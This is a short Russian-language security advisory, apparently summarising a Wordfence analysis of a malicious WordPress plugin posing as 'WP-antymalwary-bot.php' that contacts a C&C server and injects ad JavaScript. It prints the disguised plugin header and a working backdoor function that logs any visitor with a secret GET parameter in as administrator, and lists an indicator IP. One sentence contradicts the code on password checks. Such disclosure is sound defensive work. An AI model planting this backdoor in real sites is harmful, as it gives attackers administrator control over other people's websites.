Команда Wordfence Threat Intelligence выявила вредоносное ПО, маскирующееся под обычный плагин WordPress с названием 'WP-antymalwary-bot.php', обладающий функциями для сохранения доступа к сайту, скрытия плагина и удаленного выполнения кода.
Описание
Плагин также содержит функцию пингования для передачи данных на C&C сервер и распространения вредоносного JavaScript для отображения рекламы.
1 2 3 4 5 6 7 | <?php /** * Plugin Name: Enhanced Admin Plugin with Cache Clearing * Description: Плагин для добавления PHP-кода в header.php всех тем и очистки кеша. * Version: 3.1 * Author: NameN */ |
Обнаруженное вредоносное ПО кажется обычным плагином, использующим комментарии и внешние признаки для маскировки. Данное ПО было установлено на сайте одного из аналитиков Wordfence и представляет собой пример вредоносного программирования, позволяющего злоумышленникам получить доступ к административной панели через уязвимости плагина. Помимо базовой проверки, плагин предоставляет несанкционированный доступ администратору, что повышает уровень риска и требует дополнительных мер защиты.
Анализ вредоносного ПО показывает возможность доступа к администраторской панели через функцию emergency_login_all_admins, возникшую при обработке GET-параметров. Плагин предоставляет немедленный доступ и запрашивает ввод правильного пароля, действуя через хук init.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 | // Экстренный вход в систему function emergency_login_all_admins() { if (isset($_GET['emergency_login']) && $_GET['emergency_login'] === REDACTED) { $admins = get_users(['role' => 'administrator']); if (!empty($admins)) { $admin = reset($admins); wp_set_auth_cookie($admin->ID, true); wp_redirect(admin_url()); exit; } else { wp_die('Администраторы не найдены.'); } } } add_action('init', 'emergency_login_all_admins'); |
Индикаторы компрометации
IPv4
- 45.61.136.85